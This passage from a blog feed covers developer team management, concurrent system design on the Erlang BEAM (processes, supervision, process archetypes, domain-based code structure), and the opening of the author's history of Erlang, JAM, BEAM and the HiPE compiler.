&lt;p&gt;Setting goals was another area where commonality was found. Successful organizations like Google have a top-down yet participatory approach to goal setting. Managers provide strategic direction-such as improving response times for a specific product-and teams are encouraged to propose specific, measurable targets. These goals are then fine-tuned through a collaborative dialogue between managers and teams, ensuring the targets are ambitious yet achievable, with clear rewards tied to their accomplishment.&lt;/p&gt;
&lt;p&gt;When it comes to motivation, we discovered that while monetary bonuses are prevalent, intrinsic motivators such as career progression opportunities and a vibrant, creative work environment also play significant roles. Companies that manage to create an engaging and supportive workplace culture boost motivation and enhance overall job satisfaction among developers.
Finally, recruiting and retaining top talent seems to hinge on the attractiveness of the company culture. High-performing developers tend to attract peers of similar caliber. Our discussions highlighted the importance of a meticulous recruitment process, where technical challenges and team interviews play a crucial role in ensuring cultural and technical fit.&lt;/p&gt;
&lt;p&gt;These dialogues revealed an essential truth in software development: the right mix of people simplifies many operational challenges. By focusing on creating a supportive culture, encouraging open dialogue about goals, and recognizing both team and individual achievements, companies can enhance productivity and foster innovation and satisfaction among their teams.
I got reminded of this interview tour by
&lt;a href=&quot;https://www.inc.com/magazine/202404/ali-donaldson/how-klarnas-co-founder-learned-to-hire-tech-talent-without-a-tech-background.html&quot;&gt;an article in Inc Magazine&lt;/a&gt;
through a
&lt;a href=&quot;https://www.linkedin.com/posts/klarna_how-klarnas-co-founder-learned-to-hire-tech-activity-7186750554616799232-pru-?utm_source=share&quot;&gt;LinkedIn post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now, 15 years after those initial insightful discussions, my role as a consultant has afforded me a wider view of the software development landscape across various types and sizes of companies. Despite the passage of time and the advent of new technologies, the core challenges remain remarkably consistent.
The difficulties are universal, from small startups endeavoring to realize ambitious ideas to large corporations with thousands of developers. These large organizations often implement frameworks like SAFe or other methodologies to instill order and coherence across teams of teams. Yet, they continue to confront the same fundamental questions about productivity, motivation, goal-setting, and recruitment.&lt;/p&gt;
&lt;p&gt;A recurring theme in my observations is the central importance of the team. I later expanded on this in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/the_elephant/&quot;&gt;Developer Types&lt;/a&gt;, where I discuss how different programmer archetypes (Monkeys, Tigers, Elephants) affect team composition. The dynamics within these groups, their collaborative efficiency, and their collective skill set are often the linchpins of project success or failure. A well-aligned team can navigate complex challenges and drive projects to success, reinforcing that the collective is often greater than the sum of its parts.&lt;/p&gt;
&lt;p&gt;The quality of leadership is perhaps even more important than any other factor in an organization. Leaders who possess a clear vision and the bravery to pursue it are essential in guiding their teams through challenging situations. The ability to set clear goals, motivate teams, and make decisive decisions is the key to success - as long as they have the courage to act.
As I continue to engage with different companies, it becomes increasingly clear that while the tools and technologies evolve, the human elements of team dynamics and leadership remain key determinants of success in software development. To thrive in this field an organisation need to address these age-old challenges with innovative approaches and steadfast leadership.
One of the most valuable things that can be learned from Sebastian is the importance of proactively seeking out and building relationships with experts in a particular field. By gaining insights and knowledge from those who have already excelled, we can accelerate our own progress and success. Don&#39;t hesitate to tap into the vast resources available and learn from the best.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Designing Concurrent Systems on the BEAM</title>
    <link href="https://happihacking.com/blog/posts/2024/designing_concurrency/"/>
    <updated>2024-03-09T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/designing_concurrency/</id>
    <summary>Principles and Strategies for Robust System Design</summary>
    <content type="html">&lt;h1 id=&quot;designing-concurrent-systems-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Designing Concurrent systems on the BEAM&lt;/h1&gt;
&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/sunrise.jpeg&quot; alt=&quot;&#39;Simplicity is the ultimate sophistication.&#39; - Leonardo da Vinci&quot; title=&quot;&#39;Simplicity is the ultimate sophistication.&#39; - Leonardo da Vinci&quot; /&gt;
&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Concurrency is a necessity when developing larger software systems. It reflects our world&#39;s inherent complexity, where multiple events occur simultaneously, demanding systems that can multitask efficiently.&lt;/p&gt;
&lt;p&gt;The BEAM&#39;s concurrency model, grounded in the actor model, prioritizes lightweight processes. These processes operate in isolation, without shared memory, communicating solely through message passing. This architecture minimizes the risk of system-wide failures due to process errors. The BEAM&#39;s preemptive scheduling also ensures fair process execution time, preventing any single process from dominating the system. This model makes building efficient, reliable, scalable, and maintainable systems much more effortless.&lt;/p&gt;
&lt;p&gt;Understanding BEAM&#39;s approach to concurrency allows developers to take advantage of these features in the best possible way. In this post, I will not go into the details of how the BEAM works; I have written a whole book on the subject: &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;. Instead, I will focus on how to think about processes and concurrency when designing concurrent systems. I will recap the most important aspects of the BEAM’s concurrency model so that we understand what we are building on.&lt;/p&gt;
&lt;h2 id=&quot;beams-concurrency-model&quot; tabindex=&quot;-1&quot;&gt;BEAM’s Concurrency Model&lt;/h2&gt;
&lt;p&gt;BEAM&#39;s concurrency model uses the actor model. This model has the following defining characteristics: lightweight processes, process isolation, signals (including message passing), and scheduling.&lt;/p&gt;
&lt;p&gt;BEAM handles concurrency through lightweight processes managed by the BEAM VM rather than the underlying operating system. These extremely lightweight processes allow thousands or even millions of concurrent processes without significant overhead.
Each process in the BEAM runs in complete isolation from others, with no shared memory. Isolation ensures that failure in one process does not directly impact another, enhancing fault tolerance and system reliability.&lt;/p&gt;
&lt;p&gt;Communication between processes in the BEAM is achieved exclusively through signals. This mechanism ensures the decoupling of processes, as they do not share state directly. The most used signal is the message signal, which allows one process to send a message to another asynchronously.
The BEAM uses preemptive scheduling that allocates execution time to processes. Preemptive scheduling prevents any single process from monopolizing the system and ensures that all processes are serviced appropriately.&lt;/p&gt;
&lt;p&gt;These features and the built-in constructs for error handling make it easy to build fault-tolerant and resilient systems, for example, through supervisors and supervision trees.&lt;/p&gt;
&lt;p&gt;The lack of true process isolation in most programming languages and environments is the root cause of the rising popularity of microservices.&lt;/p&gt;
&lt;h2 id=&quot;processes-code&quot; tabindex=&quot;-1&quot;&gt;Processes ≠ Code&lt;/h2&gt;
&lt;p&gt;A common misconception in designing systems with BEAM is equating processes with modules, gen_servers, or the specific code that is spawned. This view muddles the understanding of the architecture and misses the depth of BEAM&#39;s concurrency model. Let&#39;s dissect this notion with a clear, logical approach to appreciate the distinction between processes and the code they execute.&lt;/p&gt;
&lt;p&gt;A process in the BEAM environment is an independent entity capable of executing code. However, it&#39;s crucial to understand that the process is not the code. The process is the executor that brings code to life. A process can run any code assigned to it, whether it&#39;s a simple function or a complex gen_server. This versatility means that processes are not inherently tied to the nature or purpose of the code they execute.
Understanding that processes are separate from the code they execute has significant implications for system design. Since processes are independent executors, they isolate code execution, preventing failures in one process from directly affecting others. It becomes easier to manage concurrency as each process is a distinct execution unit. Developers can spawn, monitor, and control processes dynamically, adapting to the system&#39;s concurrent demands without being bogged down by the specifics of the code within each process.&lt;/p&gt;
&lt;p&gt;A developer needs to understand that when he looks at the code in a module, this code can be executed by any process. Even if a module has a start function that spawns a process to execute, for example, a server loop in the module, it does not mean that the module is that server. Some other process executes the code that does the spawning, so the server process does not execute the start function. On the other hand, the server loop will probably contain several calls to functions in other modules. Hence, the server process is not limited to executing the code in the module either.
Now that we have clearly distinguished between code and processes and realized that the code is not the process, how should we think about processes?&lt;/p&gt;
&lt;h2 id=&quot;visualizing-processes-as-gnomes&quot; tabindex=&quot;-1&quot;&gt;Visualizing Processes as Gnomes&lt;/h2&gt;
&lt;p&gt;When designing concurrent systems on the BEAM, it can be helpful to personify processes to understand their roles and interactions better. One such visualization is to think of processes as gnomes or workers in a complex, bustling workshop. Each gnome has its tasks, knowledge (state), and means of communication, working independently yet contributing to the workshop&#39;s overall goals. This metaphor offers a tangible way to grasp BEAM&#39;s abstract concepts of process management, state, and communication.&lt;/p&gt;
&lt;p&gt;Imagine each gnome as an independent worker with a specific job. In the context of BEAM, these jobs are described in the code processes execute. Like gnomes, processes operate independently, holding their state in their &amp;quot;heads.&amp;quot; This state is private and unique to each process, mirroring how each gnome knows only what is in its head.&lt;/p&gt;
&lt;p&gt;Communication among gnomes is akin to asynchronous message passing in BEAM. They &amp;quot;talk&amp;quot; by sending messages to each other without expecting an immediate response, allowing them to continue their tasks without waiting. This method of communication increases the level of concurrency and efficiency in the system, ensuring that no single gnome or process becomes a bottleneck.&lt;/p&gt;
&lt;p&gt;Each gnome reads the instructions (code) and performs the described task. This step-by-step execution highlights the process&#39;s role as an executor of code, adhering to the earlier principle that processes are not the code itself but rather the entities that bring the code to life. Reading and executing instructions emphasizes the dynamic nature of process-based execution, where each process can handle diverse tasks depending on the code.
Just as gnomes might sometimes encounter difficulties or confusion in their tasks, processes in BEAM can also run into issues that hinder their execution. Here, the concept of supervision comes into play. Supervisors are akin to wise, overseeing gnomes who ensure that if any worker encounters a problem, the issue is addressed promptly-restarting the task, reassigning it, or taking corrective measures. This supervision mechanism is essential for building resilient systems that can recover from failures and continue operating smoothly.&lt;/p&gt;
&lt;p&gt;Visualizing processes as gnomes or workers enriches our understanding of concurrent systems on BEAM, making abstract concepts more relatable and easier to grasp. This metaphor helps developers and system architects envision architecture as a lively ecosystem of independent yet interconnected entities, each with its role, state, and means of communication. It underscores the importance of designing systems that are efficient, scalable, and robust enough to handle failures gracefully, ensuring uninterrupted operations.&lt;/p&gt;
&lt;p&gt;By embracing this visualization, we can approach system design with a clearer, more tangible perspective, fostering creativity and innovation in building and managing concurrent systems on the BEAM. It&#39;s a reminder that at the heart of every complex system, there are simple, fundamental principles guiding its operation-principles that, when understood and applied effectively, can lead to the creation of truly exceptional software. I expand on this metaphor in much more detail in the &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; series.&lt;/p&gt;
&lt;p&gt;Think About Tasks when Dividing Responsibility&lt;/p&gt;
&lt;p&gt;A fundamental aspect of designing concurrent systems on BEAM involves defining tasks and assigning responsibilities to processes. A clear, logical approach to task allocation enhances the system&#39;s efficiency and reliability. This section outlines a methodology for deciding process responsibility by focusing on task completion from start to finish, illustrating with examples for clarity.&lt;/p&gt;
&lt;p&gt;In BEAM, each process should be responsible for a specific task, ensuring it can be executed from inception to completion. This principle of dedicated responsibility simplifies system design, making it easier to debug, scale, and manage. It aligns with encapsulation, where each process, like a microservice, independently manages its state and behavior.&lt;/p&gt;
&lt;p&gt;Let&#39;s consider a real-world example to illustrate task allocation: a web application that handles user registration, data processing, and notifications. In this scenario:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User Registration Process: This process handles everything related to registering a new user - from receiving the registration request to validating the data and storing the user&#39;s information in the database.
Data Processing Process: Once a user is registered, a separate process might handle data processing tasks, such as analyzing user data for insights or preparing the data for other parts of the system.&lt;/li&gt;
&lt;li&gt;Notification Process: A distinct process could manage sending notifications to users, whether a welcome email post-registration or alerts based on user activity.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For larger, more complex tasks, dividing the task into subtasks executed by other processes ensures manageability and scalability. Consider a process responsible for handling a high-volume data analysis task. This process can delegate specific analytical tasks to subprocesses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Main Data Analysis Process: Coordinates the overall task, receiving the initial request and returning the final report.
Subprocesses for Analysis: Performs detailed analysis of parts of the data.&lt;/li&gt;
&lt;li&gt;Subprocess for Report generation: Gathers results from all analyses and prepares a comprehensive report.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each subprocess is responsible for its task from start to finish, ensuring clear boundaries and simplifying the development and troubleshooting processes.&lt;/p&gt;
&lt;p&gt;The key is to ensure that one process is ultimately responsible for a task from start to finish. This does not preclude it from delegating parts of the task to other processes. It also implies that it coordinates the overall task, including initiating subprocesses and compiling their outcomes into a final result. This approach maximizes the benefits of BEAM&#39;s concurrency model, allowing for efficient parallel processing while maintaining order and accountability.&lt;/p&gt;
&lt;p&gt;Thinking of task allocation and process responsibility has several advantages. The system architecture becomes easier to understand and maintain by assigning clear responsibilities. Isolating tasks to specific processes improves the system&#39;s ability to recover from errors, as failures are contained within individual processes. It becomes easier to scale the system by adding more processes to handle the increased load or by optimizing individual processes for performance.&lt;/p&gt;
&lt;h2 id=&quot;structuring-systems-by-thinking-about-flow&quot; tabindex=&quot;-1&quot;&gt;Structuring Systems by Thinking About Flow&lt;/h2&gt;
&lt;p&gt;In concurrent system design, especially within the BEAM environment, an alternative approach to defining process responsibilities is conceptualizing the system in terms of flow. This method emphasizes the movement and transformation of data or tasks through the system, offering a dynamic perspective that complements the task-centric view. By focusing on flow, designers can identify natural divisions within the system, leading to a more intuitive distribution of processes that align with the system&#39;s operational logic.&lt;/p&gt;
&lt;p&gt;Flow refers to the sequence and interaction of operations within a system to achieve a specific outcome. It encompasses the path data takes from input to output, including all intermediate processing steps. Visualizing a system’s flow helps identify key points where processes can be introduced to handle specific workflow segments efficiently.&lt;/p&gt;
&lt;p&gt;Mapping out the flow shows how data or tasks move through the system, highlighting dependencies and potential bottlenecks. By examining the flow, developers can pinpoint logical points to introduce processes. These points often correspond to changes in data state, decision branches, or integration with external systems. Structuring systems around flow makes it easier to scale or modify parts of the system independently, as the impact on the overall workflow is clearer. Understanding the flow aids in tracing issues within the system, as it maps the path of data or tasks through various processes.&lt;/p&gt;
&lt;p&gt;To effectively implement a flow-based approach in BEAM systems, consider the following strategies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Event-Driven Processes: Design processes that are triggered by specific events in the flow, ensuring that they are reactive and aligned with the system’s operational dynamics.&lt;/li&gt;
&lt;li&gt;Pipeline Architecture: Construct a pipeline where each process is a stage in the flow, receiving input, performing its operation, and passing the output to the next stage. This model is particularly effective for data processing and transformation tasks.
State Management: For complex state management flows, consider using processes to encapsulate stateful operations, ensuring that state changes are localized and manageable.&lt;/li&gt;
&lt;li&gt;Flow Control Processes: Implement processes dedicated to controlling the flow, such as routing, load balancing, and error handling, to maintain smooth operation across the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Imagine a web application that processes user requests. The flow begins with receiving the request, validating it, processing it (e.g., querying a database), and finally responding to the user.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Request Receiver Process: Handles incoming requests, acting as the entry and exit point of the flow.&lt;/li&gt;
&lt;li&gt;Validator Process: Checks the validity of the request before further processing.&lt;/li&gt;
&lt;li&gt;Data Processor Process: Interacts with the database or performs the core logic based on the validated request.&lt;/li&gt;
&lt;li&gt;Response Process: Compiles the response and returns it to the receiver process.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each process represents a distinct stage in the flow, with clear responsibilities and interactions defined by the sequence of operations handling a web request.&lt;/p&gt;
&lt;p&gt;Thinking about flow offers a complementary perspective to task-based process division in BEAM systems, focusing on how data and tasks move and transform. This approach facilitates a clear, logical structure for concurrent systems, enhancing understandability, scalability, and maintainability. By aligning processes with the natural flow of operations, designers can create efficient, responsive systems that effectively leverage the concurrent capabilities of the BEAM environment.&lt;/p&gt;
&lt;h2 id=&quot;process-archetypes-in-beam-systems&quot; tabindex=&quot;-1&quot;&gt;Process Archetypes in BEAM Systems&lt;/h2&gt;
&lt;p&gt;When constructing a BEAM system, the design of processes can benefit from categorizing them into specific archetypes. These archetypes assist in organizing the processes according to their purpose and behavior and facilitate a more robust and maintainable system structure. Here are examples of process archetypes within BEAM systems:&lt;/p&gt;
&lt;h3 id=&quot;workers&quot; tabindex=&quot;-1&quot;&gt;Workers&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Pool Workers: These are processes designed to handle a queue of tasks, typically managed by a pool supervisor. They are ideal for tasks that can be executed in parallel, maximizing resource utilization.&lt;/li&gt;
&lt;li&gt;Short-lived Workers: These workers are used for one-off, transient tasks that do not require maintaining a state after completing their job. They are often used for infrequent or minor tasks and do not justify the overhead of a pool of long-lived processes. To avoid garbage collection, spawn up a worker process with a large enough heap for the task and let it die when it is done, immediately reclaiming all the memory.&lt;/li&gt;
&lt;li&gt;Servers: Long-lived workers like &lt;code&gt;gen_servers&lt;/code&gt; are designed to handle ongoing tasks and maintain state over time. They&#39;re the backbone of many systems, managing consistent state and providing services to other parts of the system.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;flow-control&quot; tabindex=&quot;-1&quot;&gt;Flow Control&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Synchronize / Lock: Processes that ensure only one worker can access a resource at a time, preventing race conditions.
Serialize / Keep (priority) order: These are designed to order processes or tasks, which is critical in systems where the sequence of operations matters.&lt;/li&gt;
&lt;li&gt;Rate Limiter / Circuit Breaker: Processes that control the flow of tasks to prevent system overloads. They act as safeguards, limiting the traffic rate or shutting down parts of the system if they become unresponsive.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;data-flow&quot; tabindex=&quot;-1&quot;&gt;Data Flow&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Keepers of State: Processes that maintain and manage state information, critical for both short-term and long-term state management.&lt;/li&gt;
&lt;li&gt;Resource Owner: Processes that exclusively own and manage specific resources, such as files or network connections.&lt;/li&gt;
&lt;li&gt;Connections, Listeners, and Monitors: Processes that handle incoming traffic, listen for requests, or monitor resources for changes.&lt;/li&gt;
&lt;li&gt;Forwarders, Routers, and Broadcasters: Processes that move data through the system, directing traffic to the appropriate destinations or distributing messages to multiple recipients.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;error-handling&quot; tabindex=&quot;-1&quot;&gt;Error Handling&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Supervisors: These processes are crucial for system resilience. They monitor worker processes and apply pre-defined strategies to handle failures, such as restarting the failed processes.&lt;/li&gt;
&lt;li&gt;Insulators: Processes that contain faults within a certain part of the system to prevent cascading failures. They can also act similarly to circuit breakers, isolating parts of the system that may cause broader system issues.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Designing BEAM processes according to these archetypes ensures that each process has a clear role and responsibility, essential for the system&#39;s maintainability and scalability. It also allows for a modular approach, where each process can be independently developed, tested, and optimized. I later refined these categories into five distinct &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;process archetypes&lt;/a&gt; with a dedicated post for each role.&lt;/p&gt;
&lt;h2 id=&quot;structure-code-by-domains&quot; tabindex=&quot;-1&quot;&gt;Structure Code by Domains&lt;/h2&gt;
&lt;p&gt;In the final section of our exploration into BEAM system design, we turn our attention to code structure. A vital strategy for effectively organizing code is to align it with business domains. This approach breaks down the system into distinct areas of functionality that correspond with different aspects of the business operations they represent.&lt;/p&gt;
&lt;p&gt;Each domain should represent a core business function, providing a focus for the development efforts. Developers can create systems that mirror the business&#39;s real-world organization by aligning code structure with these domains.
Domains establish clear boundaries within the codebase. This separation ensures that changes in one domain do not have unintended effects on others, facilitating easier maintenance and scalability.&lt;/p&gt;
&lt;p&gt;Encapsulating domain-specific logic within its bounded context allows for a cleaner codebase. It also makes the system more adaptable to changes within that domain without affecting the core functionalities of other domains.&lt;/p&gt;
&lt;p&gt;Now that we have divided the system into domains, the next step is to construct it by integrating functions, modules, and applications.
Starting with a broad perspective and narrowing down to specifics, we can think of system design in three primary layers: applications, modules, and functions. This top-down approach helps outline the system&#39;s architecture from the macro to the micro level, ensuring that each component fits into the larger purpose and design.&lt;/p&gt;
&lt;p&gt;Applications are the most expansive layer, each representing a substantial domain within the system. They are composed of several modules and define the system&#39;s macro functionality. Applications should have a clearly identified role and an API that exposes the necessary functionalities. They&#39;re the frontline of the domain, providing the services and interactions that users and other systems interface with.&lt;/p&gt;
&lt;p&gt;Within applications, modules act as subdomains. They encapsulate a related set of functionalities and abstract the specifics away from the application layer. Modules are crucial for breaking down the application&#39;s complexity into manageable segments. A well-defined module has a consistent API, the only interface through which the rest of the application interacts with the module&#39;s internal functions.&lt;/p&gt;
&lt;p&gt;At the granular level are functions, the fundamental units of execution that perform specific, well-defined tasks. They are the building blocks within modules designed to accomplish a particular operation effectively and efficiently. The system&#39;s logic resides in functions, carrying out computations and data manipulations that drive the module&#39;s capabilities.&lt;/p&gt;
&lt;p&gt;Suppose some of your functions perform general work that is not specific to an application or domain. If they are used in several places, consider breaking them out into a library application. There is no need to do this prematurely; don’t start writing frameworks and libraries before you have seen the need for the functionality in several places. And don’t take the DRY (don’t repeat yourself) principle too far.&lt;/p&gt;
&lt;p&gt;In structuring the system, we start by defining the applications, which sets the stage for the system’s capabilities and boundaries. Each application is then broken down into modules, organizing the system&#39;s complexity into focused areas that manage specific aspects of the application&#39;s responsibilities. Within each module, functions are defined to perform the operations and tasks necessary to achieve the module’s objectives.&lt;/p&gt;
&lt;p&gt;By architecting a system this way, we ensure each layer serves its purpose within the context. The application layer sets the scope and provides the necessary interfaces, and the module layer organizes and delineates the domain&#39;s internal logic. The function layer carries out the precise operations required.&lt;/p&gt;
&lt;p&gt;APIs serve as contracts between different parts of the codebase. They should be designed with clarity, ensuring that they are both self-explanatory and robust against changes in implementation. APIs should follow consistent design principles throughout the system. This consistency aids in predictability and ease of use for developers interfacing with different system parts. APIs need comprehensive documentation that explains their purpose, usage, and the domain logic they encapsulate. This documentation is vital for maintaining domain integrity and understanding throughout the system.&lt;/p&gt;
&lt;p&gt;When aligning code with business domains, developers should have a solid understanding of the business context to create domains that accurately reflect business needs. Domains are not static. As business needs evolve, so should the corresponding domains and their implementations. Domain structuring promotes collaboration between technical teams and business stakeholders, ensuring the system evolves in line with business objectives.
Structuring code by business domains provides a logical and maintainable organization within the codebase and aligns technical solutions with business strategy. This synergy between business and technology is crucial for creating systems that support and drive business objectives.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;To design concurrent systems on BEAM, it is crucial to comprehend and utilize its concurrency model. BEAM facilitates the execution of processes in complete isolation, and these processes communicate via message passing. This approach to designing systems makes them highly resilient to failure and easy to manage concurrency. It&#39;s important to note that a process is not the code it executes. Instead, consider a process as a worker and code as instructions. When designing the process architecture, it&#39;s helpful to think about tasks, flows, and process archetypes. When structuring your code, it&#39;s beneficial to think in terms of domains. These practices will help you build more robust and maintainable systems.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Three Decades with Erlang</title>
    <link href="https://happihacking.com/blog/posts/2023/erlang-history/"/>
    <updated>2023-12-14T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/erlang-history/</id>
    <summary>A Personal Odyssey</summary>
    <content type="html">&lt;img class=&quot;img-blog center&quot; src=&quot;https://happihacking.com/images/30_Years_On_and_In_the_Beam.jpeg&quot; alt=&quot;I am speaking at Code BEAM America.&quot; title=&quot;I am speaking at Code BEAM America.&quot; /&gt;
&lt;h1 id=&quot;my-brief-history-with-erlang&quot; tabindex=&quot;-1&quot;&gt;My Brief History with Erlang&lt;/h1&gt;
&lt;p&gt;As 2024 approaches, I am closing in on nearly 30 years of Erlang programming. My journey with this language began in 1994, when Erlang itself was still in its early stages of evolution. Over these decades, I have seen the growth and transformation of Erlang, and its impact on the world of telecom and beyond. This experience has given me a unique perspective on the development of Erlang and its runtime system, ERTS.&lt;/p&gt;
&lt;h2 id=&quot;erlangs-genesis-engineering-modern-telecom&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Genesis: Engineering Modern Telecom&lt;/h2&gt;
&lt;p&gt;The Erlang Runtime System (ERTS) was born from Ericsson&#39;s need to create a robust and efficient telecommunications infrastructure. This runtime system was designed to handle the demanding and concurrent requirements of both mobile and fixed phone networks.&lt;/p&gt;
&lt;p&gt;The groundwork established by Joe Armstrong, Mike Williams, and Robert Virding, under Bjarne Däcker&#39;s mentorship, shaped the core principles and architecture of Erlang. They recognized the importance of independent concurrent processes for telecom applications. Their focus on concurrency from the beginning was a strategic decision that aligned perfectly with the parallel nature of telecommunication operations, where multiple tasks need to run simultaneously and independently.&lt;/p&gt;
&lt;p&gt;Unlike traditional systems where concurrency often lead to complex issues like deadlock and race conditions, BEAM&#39;s architecture allows each process to operate independently. This independence is key in ensuring that the failure of one process does not cascade into a system-wide failure.&lt;/p&gt;
&lt;p&gt;Another aspect of BEAM&#39;s design contributing to its robustness is its soft real-time capabilities. In telecom networks, &#39;soft real-time&#39; refers to the system&#39;s ability to process and respond to inputs within a reasonable timeframe. This is essential for services like voice calls or data transmission, where delays or interruptions can degrade the quality of service.&lt;/p&gt;
&lt;p&gt;BEAM also features a sophisticated error-handling mechanism. It allows individual processes to fail and restart without affecting the overall system. This approach, often called &amp;quot;let it crash,&amp;quot; is a radical departure from traditional error handling but proves highly effective in maintaining system integrity. By localizing failures and managing them effectively, BEAM ensures that the larger system continues to operate smoothly.&lt;/p&gt;
&lt;p&gt;Combining these features - efficient management of concurrency, soft real-time processing, and robust error handling - makes BEAM uniquely suited for the demands of global communication networks. It enables systems built on Erlang and running on BEAM to offer high availability and reliability. As such, BEAM support a wide array of services that range from everyday communications to data transfers.&lt;/p&gt;
&lt;p&gt;&lt;a title=&quot;Tekniska museet, Public domain, via Wikimedia Commons&quot; href=&quot;https://commons.wikimedia.org/wiki/File:Telefontornet_1890.jpg&quot;&gt;&lt;img alt=&quot;Telefontornet 1890&quot; src=&quot;https://upload.wikimedia.org/wikipedia/commons/thumb/9/93/Telefontornet_1890.jpg/512px-Telefontornet_1890.jpg&quot; style=&quot;width: 100%; object-fit: contain;&quot; /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;erlangs-early-years-foundations-and-evolution&quot; tabindex=&quot;-1&quot;&gt;Erlang&#39;s Early Years: Foundations and Evolution&lt;/h2&gt;
&lt;p&gt;But let&#39;s go back to the origins of Erlang and its developmental journey. The language and the name came sometime in 1986 and 1987.&lt;/p&gt;
&lt;p&gt;Initially, Erlang was implemented in Prolog, but this early version faced limitations, especially in terms of speed and efficiency. When Erlang started to get real users around 1989 these issues had to be addressed. This led to the development of JAM (Joe&#39;s Abstract Machine) which was heavily influenced by WAM the virtual machine for prolog. JAM represented a significant advancement in Erlang&#39;s development, laying the foundational groundwork for what would eventually evolve into BEAM.&lt;/p&gt;
&lt;p&gt;JAM overcame some of Erlang&#39;s initial performance challenges. However, as Erlang began to be used more extensively, the need for a more efficient and robust system became apparent. This led to the development of BEAM, starting in 1993 as a compiler to C. You can read more about this in &lt;a href=&quot;https://dl.acm.org/doi/abs/10.1145/1238844.1238850&quot;&gt;A history of Erlang&lt;/a&gt; by Joe Armstrong.&lt;/p&gt;
&lt;h2 id=&quot;beam-advancing-erlangs-core&quot; tabindex=&quot;-1&quot;&gt;BEAM: Advancing Erlang&#39;s Core&lt;/h2&gt;
&lt;p&gt;BEAM brought several improvements over JAM, focusing on speed of execution, with features such as
a threaded code dispacher and mapping of virtual machine registers to CPU registers.&lt;/p&gt;
&lt;p&gt;Thus, the evolution from Prolog-based Erlang to JAM, and subsequently to BEAM, illustrates a path of continuous refinement and adaptation. Each stage was driven by the changing needs of the systems Erlang aimed to support, with each new development building upon the strengths of its predecessors.
You can read more about how BEAM works in &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/beams.JPG&quot; alt=&quot;Beams of light and wood.&quot; title=&quot;Beams of light and wood.&quot; /&gt;
&lt;h2 id=&quot;hipe-pushing-erlangs-performance-envelope&quot; tabindex=&quot;-1&quot;&gt;HiPE: Pushing Erlang&#39;s Performance Envelope&lt;/h2&gt;
&lt;p&gt;My involvement in the evolution of Erlang&#39;s ecosystem began with my work on the Jericho compiler. This project was part of my master&#39;s thesis and aimed toward efficiency and speed of execution of Erlang code. Jericho, a JIT native code compiler for Erlang, was written in C and translated JAM code into SPARC v9 assembler. This translation improved performance, addressing one of the key limitations of JAM.&lt;/p&gt;
&lt;p&gt;The pursuit of optimizing Erlang&#39;s performance further led to my doctoral research and the creation of the High-Performance Erlang (HiPE) group and compiler. Unlike Jericho, HiPE was written in Erlang and was designed to convert both JAM and BEAM bytecode into machine code. This capability was not limited to a single architecture; HiPE supported multiple architectures, including x86, SPARC, and ARM.&lt;/p&gt;
&lt;p&gt;The advancements brought by the HiPE group to ERTS were substantial. During this period, our focus extended to garbage collection strategies, exploring the effectiveness of approaches such as hybrid and common heaps for processes. We also pioneered a just-in-time compilation method, implemented on a per-function basis.&lt;/p&gt;
&lt;p&gt;I was fortunate to collaborate with a team of esteemed colleagues in the HiPE project, including Kostis Sagonas, Mikael Pettersson, Richard Carlsson, Tobias Lindahl, Per Gustafsson, and Jesper Wilhelmsson. This collaboration extended to working closely with the OTP team, where we fine-tuned inter-process communication, introduced binary searches for extensive pattern matching, and redesigned BEAM&#39;s tagging scheme for enhanced efficiency.&lt;/p&gt;
&lt;p&gt;The work of my colleagues in the HiPE team also led to notable contributions to the language and the virtual machine. These include the introduction of Core Erlang and EDoc, implementation of bit syntax, refinements in floating-point arithmetic, the addition of type specs, and the development of the Dialyzer for static code analysis. Each of these contributions played a crucial role in enhancing the robustness and efficiency of the BEAM ecosystem.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/hipe_logo_medium.gif&quot; alt=&quot;The HiPE logo, also beaming.&quot; title=&quot;The HiPE logo, also beaming.&quot; /&gt;
&lt;h2 id=&quot;diversifying-with-scala-and-simics-broadening-horizons&quot; tabindex=&quot;-1&quot;&gt;Diversifying with Scala and Simics: Broadening Horizons&lt;/h2&gt;
